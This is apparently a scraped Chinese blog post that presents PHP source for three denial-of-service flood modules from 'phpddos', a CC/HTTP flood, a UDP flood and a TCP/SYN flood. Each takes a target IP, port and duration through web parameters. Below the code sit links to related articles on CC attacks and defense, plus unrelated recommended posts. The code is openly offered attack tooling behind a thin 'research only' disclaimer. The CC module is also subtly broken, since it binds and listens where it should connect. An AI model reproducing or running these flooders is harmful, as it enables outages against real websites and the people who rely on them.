网络安全向,请勿用作非法用途

CC攻击模块:

<?php
echo “状态 : 正常运行中…..<br>”;
echo “================================================<br>”;
echo ”  <font color=blue>www.phpddos.com<br>”;
echo ”  CC Flood 模块<br>”;
echo ”  作者:ybhacker<br>”;
echo ”  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>”;
echo “================================================<br><br>”;
error_reporting(E_ALL);  //提示错误信息
set_time_limit(0);     //设定一个程式所允许执行的秒数   0 是无限循环
ob_implicit_flush();     // 刷新输出缓冲
$address = $_POST[‘site’];  // 网站地址
$port = $_POST[‘port’];      // 端口
$dongu = $_POST[‘dongu’];   //循环次数
$sayi = 1;
while ( $sayi <= $dongu )   //变量asyi小于 循环次数变量 dongu 才会继续循环
{
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {
echo “HaHa\n”;
}
if (socket_bind($sock, $address, $port) === false) {       // 连接端口
echo “HaHa\n”;
}
if (socket_listen($sock, 5) === false) {
echo “HaHa\n”;
}
$msg = “HTTP/1.1 GET /\r\nHost:”+$_GET[‘site’]+”\r\nConnection: Keep-Alive\r\n”;
socket_write($msg);
socket_close($sock);
$sayi++;   // 循环一次 变量sayi 加1
echo “Goodbye…”.$sayi;   // 输出循环次数
}
?>

UDP攻击模块:

<?php
$packets = 0;
$ip = $_GET[‘ip’];
$port = $_GET[‘port’];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[‘time’];
$time = time();
print “状态 : 正常运行中…..<br>”;
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= “phpddos”;
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(“udp://$ip”, $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo “================================================<br>”;
echo ”  <font color=blue>www.phpddos.com<br>”;
echo ”  作者:ybhacker<br>”;
echo ”  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>”;
echo “================================================<br><br>”;
echo ”  攻击包总数:<font color=Red><span class=\”text\”>”.$packets.” 个数据包</span><br><br></font>”;
echo ”    攻击总流量:<font color=Red><span class=\”text\”>”.round(($packets*65*8)/(1024*1024),2).” Mbps</span><br><br></font>”;
echo ”  攻击总字节:<font color=Red><span class=\”text\”>”.time(‘h:i:s’).” 字节</span><br><br></font>”;
echo “Packet complete at “.time(‘h:i:s’).” with $packets (” .round(($packets*65*8)/(1024*1024),2). ” Mbps) packets averaging “. round($packets/$exec_time, 2) . ” packets/s \n”;
?>

TCP攻击模块:

<?php
ini_set(“display_errors”, “Off”);
$packets = 0;
$ip = $_GET[‘ip’];
$port = $_GET[‘port’];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[‘time’];
$time = time();
print “状态 : 正常运行中…..<br>”;
$max_time = $time+$exec_time;
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(“tcp://$ip”, $port,$errno,$errstr,0);
}
echo “================================================<br>”;
echo ”  <font color=blue>www.phpddos.com<br>”;
echo ”  SYN Flood 模块<br>”;
echo ”  作者:ybhacker<br>”;
echo ”  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>”;
echo “================================================<br><br>”;
echo ”  攻击包总数:<font color=Red><span class=\”text\”>”.$packets.” 个数据包</span><br><br></font>”;
echo ”    攻击总流量:<font color=Red><span class=\”text\”>”.round(($packets*65*8)/(1024*1024),2).” Mbps</span><br><br></font>”;
echo ”  攻击总字节:<font color=Red><span class=\”text\”>”.time(‘h:i:s’).” 字节</span><br><br></font>”;
echo “Packet complete at “.time(‘h:i:s’).” with $packets (” .round(($packets*65*8)/(1024*1024),2). ” Mbps) packets averaging “. round($packets/$exec_time, 2) . ” packets/s \n”;
?>

PHP DDOS的UDP攻击,TCP攻击,和CC攻击的核心代码的更多相关文章

  1. DDoS攻防战(二):CC攻击工具实现与防御理论

    我们将要实现一个进行应用层DDoS攻击的工具,综合考虑,CC攻击方式是最佳选择,并用bash shell脚本来快速实现并验证这一工具,并在最后,讨论如何防御来自应用层的DDoS攻击. 第一步:获取大量 ...

  2. DDoS攻防战 (二) :CC攻击工具实现与防御理论

    故上兵伐谋 其次伐交 其次伐兵 其下攻城 攻城之法 为不得已 知己知彼 百战不殆 不知彼而知己 一胜一负 不知彼不知己 每战必败 ——孙子兵法·谋攻 我们将要实现一个进行应用层DDoS攻击的工具,综合 ...

  3. DDoS攻防战(二):CC攻击工具实现与防御理论--删除

    我们将要实现一个进行应用层DDoS攻击的工具,综合考虑,CC攻击方式是最佳选择,并用bash shell脚本来快速实现并验证这一工具,并在最后,讨论如何防御来自应用层的DDoS攻击. 第一步:获取大量 ...

  4. DDoS攻防战 (四):CC攻击防御系统部署

    1. 系统效果 此DDOS应用层防御系统已经部署在了http://www.yfdc.org网站上(如果访问失败,请直接访问位于国内的服务器http://121.42.45.55进行在线测试). 此防御 ...

  5. ddos cc攻击简单介绍(转)

    何为syn flood攻击: SYN Flood是一种广为人知的DoS(拒绝服务攻击)是DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻 ...

  6. CC攻击与DDOS攻击区别

    二者的攻击方式主要分为三种:直接攻击.代理攻击.僵尸网络攻击 CC攻击是DDOS(分布式拒绝服务)的一种,相比其它的DDOS攻击CC似乎更有技术含量一些.这种攻击你见不到虚假IP,见不到特别大的异常流 ...

  7. linux中防CC攻击两种实现方法(转)

    CC攻击就是说攻击者利用服务器或代理服务器指向被攻击的主机,然后模仿DDOS,和伪装方法网站,这种CC主要是用来攻击页面的,导致系统性能用完而主机挂掉了,下面我们来看linux中防CC攻击方法. 什么 ...

  8. 什么是CC攻击,如何防止网站被CC攻击的方法总汇

    CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,也是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一 ...

  9. 浅谈iptables防SYN Flood攻击和CC攻击

    ------------------------本文为自己实践所总结,概念性的东西不全,这里粗劣提下而已,网上很多,本文主要说下目前较流行的syn洪水攻击和cc攻击------------------ ...

  10. 网站防止CC攻击的方法

    CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,也是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一 ...

随机推荐

  1. [实战]MVC5+EF6+MySql企业网盘实战(4)——上传头像

    写在前面 最近又开始忙了,工期紧比较赶,另外明天又要去驾校,只能一个功能一个功能的添加了,也许每次完成的功能确实不算什么,等将功能都实现了,然后在找一个好点的ui对前端重构一下. 系列文章 [EF]v ...

  2. mysql distinct 后面没有括号

    当distinct应用到多个字段的时候,其应用的范围是其后面的所有字段,而不只是紧挨着它的一个字段,而且distinct只能放到所有字段的前面 如下语句是错误的: SELECT country, di ...

  3. poj3613 Cow Relays【好题】【最短路】【快速幂】

    Cow Relays Time Limit: 1000MS   Memory Limit: 65536K Total Submissions:9207   Accepted: 3604 Descrip ...

  4. css学习_css复合选择器

    css复合选择器 a.交集选择器  (即...又...:选择器之间不能有空格) p.one{color:red;] b.并集选择器(中间由逗号隔开) p,div{color:red;} c.后代选择器 ...

  5. CCPC-Wannafly Winter Camp Day4 Div1 - 夺宝奇兵 - [简单思维题]

    题目链接:https://zhixincode.com/contest/18/problem/A?problem_id=259 题目描述 wls正在玩一个寻宝游戏. 宝藏一共有 $n$ 种,都藏在一个 ...

  6. 【作业】DS稀疏矩阵

    写了两个小时,书上代码好难看啊 #define _CRT_SECURE_NO_WARNINGS #include<stdio.h> #include<stdlib.h> #in ...

  7. git bash 常用命令

    1.   cd : 切换到哪个目录下, 如 cd e:\fff  切换 E 盘下面的fff 目录. 当我们用cd 进入文件夹时,我们可以使用 通配符*, cd f*,  如果E盘下只有一个f开头的文件 ...

  8. 2014年蓝桥杯省赛A组c++第1题(暴力求解)

    /* 小明带两个妹妹参加元宵灯会.别人问她们多大了,她们调皮地说:“我们俩的年龄之积是年龄之和的6倍”. 小明又补充说:“她们可不是双胞胎,年龄差肯定也不超过8岁啊.” 请你写出:小明的较小的妹妹的年 ...

  9. Django 发送电子邮件

    官方片段: 虽然Python使得通过smtplib 模块发送电子邮件相对容易,但Django提供了一些轻量级包装.提供这些包装器是为了使发送电子邮件更加快速,以便在开发过程中轻松测试电子邮件发送,并为 ...

  10. websocketd

    https://www.cnblogs.com/tinywan/p/6826125.html https://www.jianshu.com/p/63afd0099565